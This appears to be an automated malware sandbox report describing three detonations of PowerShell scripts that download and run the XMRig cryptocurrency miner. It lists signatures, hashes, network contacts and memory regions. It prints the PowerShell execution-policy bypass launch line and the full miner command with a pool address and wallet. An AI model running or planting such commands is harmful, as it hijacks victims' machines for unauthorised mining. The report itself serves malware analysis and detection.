memory/4760-139-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-140-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-141-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-142-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-143-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-144-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-145-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-146-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-147-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-148-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-149-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-150-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-151-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-152-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-153-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-154-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-155-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:06

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1742s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.73.50.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4184-4-0x00007FFBE0F83000-0x00007FFBE0F84000-memory.dmp

memory/4184-5-0x000001EE67220000-0x000001EE67242000-memory.dmp

memory/4184-9-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_52t5cjcj.im2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4184-8-0x000001EE67420000-0x000001EE67496000-memory.dmp

memory/4184-20-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

memory/4184-25-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

memory/4184-48-0x000001EE673C0000-0x000001EE673D2000-memory.dmp

memory/4184-61-0x000001EE673A0000-0x000001EE673AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1408-90-0x000002A0E5BC0000-0x000002A0E5BE0000-memory.dmp

memory/1408-91-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-92-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/4184-93-0x00007FFBE0F83000-0x00007FFBE0F84000-memory.dmp

memory/4184-94-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

memory/4184-95-0x00007FFBE0F80000-0x00007FFBE196C000-memory.dmp

memory/1408-96-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-97-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-98-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-99-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-100-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-101-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-102-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-103-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-104-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-105-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-106-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-107-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-108-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-109-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-110-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-111-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-112-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-113-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-114-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-115-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-116-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-117-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-118-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-119-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-120-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-121-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-122-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-123-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-124-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-125-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-126-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-127-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-128-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-129-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-130-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-131-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-132-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-133-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-134-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-135-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-136-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-137-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-138-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-139-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-140-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-141-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-142-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-143-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-144-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-145-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-146-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-147-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-148-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-149-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-150-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-151-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-152-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-153-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-154-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-155-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

memory/1408-156-0x00007FF700AA0000-0x00007FF7016D3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:18

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.43:443 tcp

Files

memory/3080-0-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_osxajhmk.mrd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3080-9-0x00000237E65C0000-0x00000237E65E2000-memory.dmp

memory/3080-10-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/3080-11-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/3080-12-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/3080-14-0x00000237E69A0000-0x00000237E69B2000-memory.dmp

memory/3080-15-0x00000237E6980000-0x00000237E698A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/388-46-0x0000024816A60000-0x0000024816A80000-memory.dmp

memory/388-47-0x00000248AA7D0000-0x00000248AA7F0000-memory.dmp

memory/388-48-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/3080-49-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp

memory/3080-50-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp

memory/388-52-0x00000248AAE40000-0x00000248AAE60000-memory.dmp

memory/388-51-0x00000248AAC10000-0x00000248AAC30000-memory.dmp

memory/388-53-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-54-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-57-0x00000248AAE40000-0x00000248AAE60000-memory.dmp

memory/388-56-0x00000248AAC10000-0x00000248AAC30000-memory.dmp

memory/388-55-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-58-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-59-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-60-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-61-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-62-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-63-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-64-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-65-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-66-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-67-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-68-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-69-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-70-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-71-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-72-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-73-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-74-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-75-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-76-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-77-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-78-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-79-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-80-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-81-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-82-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-83-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-84-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-85-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-86-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-87-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-88-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-89-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-90-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-91-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-92-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-93-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-94-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-95-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-96-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-97-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-98-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-99-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-100-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-101-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-102-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-103-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-104-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-105-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-106-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-107-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-108-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-109-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-110-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-111-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-112-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-113-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-114-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-115-0x00007FF742750000-0x00007FF743383000-memory.dmp

memory/388-116-0x00007FF742750000-0x00007FF743383000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:50

Platform

win10v2004-20240226-en

Max time kernel

1793s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3608 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4292 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 216.58.215.42:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 42.215.58.216.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:80 www.microsoft.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
